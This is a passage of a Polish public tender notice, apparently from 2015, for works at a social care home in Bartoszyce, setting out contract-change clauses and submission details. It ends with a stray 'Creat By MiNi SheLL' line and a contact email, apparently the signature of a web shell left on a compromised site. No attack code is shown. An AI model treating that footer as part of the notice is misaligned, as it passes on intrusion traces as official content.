a)	wystąpienia niekorzystnych warunków atmosferycznych (długotrwałych, obfitych opadów deszczu, niskich temperatur w dzień i w nocy) uniemożliwiających wykonywanie robót zgodnie ze szczegółowymi specyfikacjami technicznymi wykonania i odbioru robót.
b)	zaistnienia, po zawarciu umowy, przypadku siły wyższej, przez którą, na potrzeby niniejszego warunku rozumieć należy zdarzenie zewnętrzne wobec łączącej strony więzi prawnej:
charakterze niezależnym od stron,
którego strony nie mogły przewidzieć przed zawarciem umowy,
którego nie można uniknąć ani któremu strony nie mogły zapobiec przy zachowaniu należytej staranności,
której nie można przypisać drugiej stronie;
Za siłę wyższą warunkującą zmianę terminu realizacji umowy uważać się będzie w szczególności: powódź, pożar i inne klęski żywiołowe, zamieszki, strajki, ataki terrorystyczne, działania wojenne, nagłe załamania warunków atmosferycznych, nagłe przerwy w dostawie energii elektrycznej, promieniowanie lub skażenia;
c)	zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na termin realizacji przedmiotu zamówienia lub świadczenia stron;
2)	zmiana wynagrodzenia Wykonawcy, w przypadku:
a)	zmniejszenia zakresu ilościowego robót.
3) zmiana treści umowy w przypadku wystąpienia oczywistych omyłek pisarskich i rachunkowych w treści umowy, lub powstania rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie będzie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony.
4) zaistnienia okoliczności leżących po stronie Zamawiającego, w szczególności spowodowanych sytuacją finansową, zdolnościami płatniczymi lub warunkami organizacyjnymi lub okolicznościami, które nie były możliwe do przewidzenia w chwili zawarcia umowy.
3.	Zmiany o których mowa w ust. 2 pkt 2.1 ppkt a i b dopuszczone będą wyłącznie pod warunkiem złożenia wniosku przez Wykonawcę i po akceptacji Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.warmia.mazury.pl/powiat_bartoszycki/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> DOM POMOCY SPOŁECZNEJ W BARTOSZYCACH
UL. BOHATERÓW MONTE CASSINO 4
	11-200 Bartoszyce.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.08.2015 godzina 12:00, miejsce: DOM POMOCY SPOŁECZNEJ W BARTOSZYCACH, UL. BOHATERÓW MONTE CASSINO 4, 11-200 BARTOSZYCE, POKÓJ NR 7 (SEKRETARIAT).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com